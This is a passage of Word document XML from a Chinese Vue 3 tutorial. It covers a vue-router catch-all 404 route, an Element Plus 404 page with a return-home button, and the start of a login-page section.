      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将匹配所有内容并将其放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> `$route.params.pathMatch` </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135BE63" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRPr="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5A684" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRPr="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        path: '/:pathMatch(.*)*', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00620BE5" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRPr="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        name: 'NotFound', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EFFEC" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRPr="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        component: NotFound </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CCF42" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2B48">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58880CFD" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766722F8" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB574DC" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = createRouter({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655103FF" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    history: createWebHistory(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70133303" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    routes: routes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B98F114" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256550D4" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477BF0E4" w14:textId="3ADA9036" w:rsidR="007F2C96" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D53530" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266674E4" w14:textId="455139A6" w:rsidR="007F2C96" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F0B72" w14:textId="4F5A0FB0" w:rsidR="007F2C96" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D18B5EB" wp14:editId="1E30CBA0">
            <wp:extent cx="2963065" cy="2324861"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="488522555" name="图片 1"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22555" name="图片 1" descr="图形用户界面, 文本, 应用程序, 聊天或短信&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2971764" cy="2331686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786EC3B" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2168C8" w14:textId="76621153" w:rsidR="007F2C96" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义样式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD6FDD" w14:textId="5561D2B3" w:rsidR="007F2C96" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组件中找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38793565" w14:textId="38903A65" w:rsidR="007F2C96" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007275CE">
        <w:t>https://element-plus.org/zh-CN/component/result.html#%E5%9F%BA%E7%A1%80%E7%94%A8%E6%B3%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0241CE" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA34BB5" w14:textId="55F9DC4F" w:rsidR="007F2C96" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中这个惊叹号的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39772FF2" w14:textId="77777777" w:rsidR="007275CE" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704ED38C" w14:textId="6E2153ED" w:rsidR="007275CE" w:rsidRDefault="007275CE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>增加样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C50B8" w14:textId="57BF4A83" w:rsidR="007F2C96" w:rsidRDefault="00300E63" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以更改这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>走丢了”</w:t>
      </w:r>
      <w:r w:rsidR="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28550854" w14:textId="2885361E" w:rsidR="004F250D" w:rsidRDefault="004F250D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中新增点击动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击回到首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA96654" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C77AFC" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5E08D" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-col :sm="12" :lg="6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544543E" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;el-result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960B240" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        icon="warning"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA33875" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        title="404 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>页面走丢了</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9E055" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        sub-title="</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>你找的页面走丢了</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFF239" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C4A46" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;template #extra&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A49E7" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-button type="primary" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@click="$router.push('/')"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>回到首页</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49120107" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE48C7" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/el-result&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FACEF6" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/el-col&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E296F2" w14:textId="77777777" w:rsidR="00E34850" w:rsidRPr="00E34850" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D18753" w14:textId="27C5AB1D" w:rsidR="007F2C96" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E34850">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594144E1" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FC61C0" w14:textId="5CB38CC9" w:rsidR="007F2C96" w:rsidRDefault="00E34850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F2CF021" wp14:editId="7EE2D010">
            <wp:extent cx="2609647" cy="2151246"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="128719041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90414" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2617960" cy="2158099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="683EDFCF" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1CF8F7" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA0CC68" w14:textId="5759CF2D" w:rsidR="00F8110A" w:rsidRDefault="00F8110A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="687" w:name="_Toc159780117"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发登录页面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="687"/>
    </w:p>
    <w:p w14:paraId="258803BC" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FFDC5F" w14:textId="225D15EE" w:rsidR="001B61C7" w:rsidRDefault="001B61C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为是被直接引用的，直接把属性写在标签里就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47E489" w14:textId="6738276C" w:rsidR="001B61C7" w:rsidRDefault="001B61C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常写在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F089C" w14:textId="77777777" w:rsidR="001B61C7" w:rsidRDefault="001B61C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3023EA93" w14:textId="592EDCC5" w:rsidR="00F8110A" w:rsidRDefault="00332722" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB53D8" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA343C2" w14:textId="77777777" w:rsidR="00767F6D" w:rsidRDefault="006A456C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>layout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B451D" w14:textId="77777777" w:rsidR="00767F6D" w:rsidRDefault="00767F6D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>layout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
